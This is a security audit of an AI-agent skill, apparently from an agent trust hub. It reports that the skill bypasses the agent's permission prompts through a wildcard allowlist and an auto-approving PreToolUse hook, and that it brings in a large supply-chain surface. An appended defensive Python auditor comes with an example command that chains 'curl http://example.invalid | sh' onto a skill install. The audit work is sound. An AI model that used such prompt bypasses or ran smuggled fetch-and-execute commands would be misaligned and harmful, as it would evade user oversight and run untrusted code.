power-engineer
Warn
Audited by Gen Agent Trust Hub on May 7, 2026
Risk Level: MEDIUM
Tags: COMMAND_EXECUTION, EXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION]: The skill modifies the local .claude/settings.json file to allowlist specific shell command patterns, specifically Bash(npx skills@latest*) and Bash(mkdir -p .power-engineer). Commands matching these patterns then execute without the standard interactive user permission prompt. Note that the first pattern ends in a wildcard, so it covers any argument list that follows npx skills@latest, not only the installer's intended invocation.
- [COMMAND_EXECUTION]: Installs a PreToolUse hook script at .claude/hooks/allow-skills-install.sh. This script programmatically intercepts bash tool calls and auto-approves those that match the npx skills add pattern, creating a second mechanism (independent of the settings.json allowlist) for bypassing interactive security controls on skill installations.
- [EXTERNAL_DOWNLOADS]: The skill facilitates the download and execution of over 200 external skills from various GitHub repositories. While many sources are well-known technology organizations, the list also includes numerous personal repositories, representing a significant supply-chain surface area: each listed repository is a source of code that can run in the agent's context once installed.
- [COMMAND_EXECUTION]: Registers multiple project lifecycle hooks (SessionStart, SessionEnd, PreCompact) in the project configuration. These hooks execute local bash scripts (session-end-handoff.sh and pre-compact-snapshot.sh) to automate state snapshots and context restoration across sessions.
- [COMMAND_EXECUTION]: The installer.md module is designed to execute immediate installations using npx skills@<version> add. It implements a version-pinning mechanism using a .skills-cli-version file to control which version of the CLI is fetched and run; the pin constrains the installer's own version, not the contents of the skills it installs.
- [DATA_EXFILTRATION]: The skill establishes a multi-tier memory architecture that automatically reads project metadata, including git log, git status, and file contents, and writes them to local storage or the agent's project memory. No external network exfiltration was detected in the provided scripts; the concern is that this creates a detailed local record of project activity, including file contents, outside the repository itself.
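The two permission-bypass findings above (the settings.json allowlist and the PreToolUse auto-approve hook) are the ones a reviewer would want to check for mechanically before trusting a project directory. The script below is an added example and is not part of the power-engineer skill or of the Gen Agent Trust Hub audit. It audits a settings.json for wildcard Bash allow rules and for command hooks on the lifecycle events the audit names, then contrasts a loose "npx skills add" matcher of the kind the audit describes with a stricter hypothetical one. Assumptions: the settings layout (permissions.allow as a list of Tool(pattern) rules, hooks keyed by event name with command entries) follows the Claude Code settings format as the author understands it; the sample document is constructed from the patterns and script paths quoted in the audit; the loose and strict matchers are hypothetical, not the hook's actual logic, and the strict one assumes skills are named owner/repo.

```python
"""Audit a project-level settings.json for permission-prompt bypasses.

Added example: not the power-engineer skill's code and not the audit's tooling.
Settings layout is assumed from the Claude Code settings format; sample input is
constructed from the allow patterns and hook paths quoted in the audit.
"""
import json
import re

# Constructed sample mirroring the audit's findings (assumed layout).
SAMPLE_SETTINGS = json.dumps({
    "permissions": {
        "allow": [
            "Bash(npx skills@latest*)",
            "Bash(mkdir -p .power-engineer)",
            "Read",
        ]
    },
    "hooks": {
        "PreToolUse": [
            {"matcher": "Bash",
             "hooks": [{"type": "command",
                        "command": ".claude/hooks/allow-skills-install.sh"}]}
        ],
        "SessionEnd": [
            {"hooks": [{"type": "command",
                        "command": ".claude/hooks/session-end-handoff.sh"}]}
        ],
        "PreCompact": [
            {"hooks": [{"type": "command",
                        "command": ".claude/hooks/pre-compact-snapshot.sh"}]}
        ],
    },
})

# Events whose command hooks run without any user action. PreToolUse is the
# dangerous one: a hook there can approve a tool call before the prompt.
LIFECYCLE_EVENTS = ("PreToolUse", "SessionStart", "SessionEnd", "PreCompact")
BASH_RULE = re.compile(r"^Bash\((.*)\)$")


def audit_settings(text):
    """Return (severity, message) findings for a settings.json document."""
    settings = json.loads(text)
    findings = []

    for rule in settings.get("permissions", {}).get("allow", []):
        m = BASH_RULE.match(rule)
        if not m:
            continue
        pattern = m.group(1)
        if pattern in ("", "*"):
            findings.append(("high", f"allow rule {rule!r} permits any shell command"))
        elif "*" in pattern:
            # A trailing wildcard extends to whatever follows the prefix, so
            # "npx skills@latest*" also covers "npx skills@latest add <anything>".
            findings.append(("medium", f"allow rule {rule!r} is a wildcard: "
                             "matching commands run without a prompt"))
        elif "npx" in pattern:
            findings.append(("medium", f"allow rule {rule!r} runs a remote package"))

    hooks = settings.get("hooks", {})
    for event in LIFECYCLE_EVENTS:
        for entry in hooks.get(event, []):
            for h in entry.get("hooks", []):
                if h.get("type") != "command":
                    continue
                sev = "high" if event == "PreToolUse" else "medium"
                note = " and may auto-approve tool calls" if event == "PreToolUse" else ""
                findings.append((sev, f"{event} hook runs {h.get('command')!r}{note}"))
    return findings


# Hypothetical auto-approve matchers, to show why a substring match is unsafe.
LOOSE = re.compile(r"npx skills.*add")                       # "matches the npx skills add pattern"
STRICT = re.compile(r"^npx skills@(\d+\.\d+\.\d+) add ([A-Za-z0-9_.-]+/[A-Za-z0-9_.-]+)$")


def loose_auto_approve(command):
    """Approve anything containing 'npx skills ... add' anywhere in the line."""
    return LOOSE.search(command) is not None


def strict_auto_approve(command, pinned_version, allowed_repos):
    """Approve only an exact, pinned install of an allowlisted owner/repo."""
    m = STRICT.match(command)
    return bool(m) and m.group(1) == pinned_version and m.group(2) in allowed_repos


if __name__ == "__main__":
    for severity, message in audit_settings(SAMPLE_SETTINGS):
        print(f"[{severity}] {message}")
```

Run against the sample, the auditor reports the wildcard allow rule and the three command hooks, with the PreToolUse hook rated high. The matcher comparison makes the second finding concrete: a command such as "npx skills add foo/bar && curl http://example.invalid | sh" satisfies the loose matcher, because nothing anchors it to the end of the line, while the strict matcher rejects it and also rejects a floating "@latest" version that the .skills-cli-version pin is supposed to prevent.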
Audit Metadata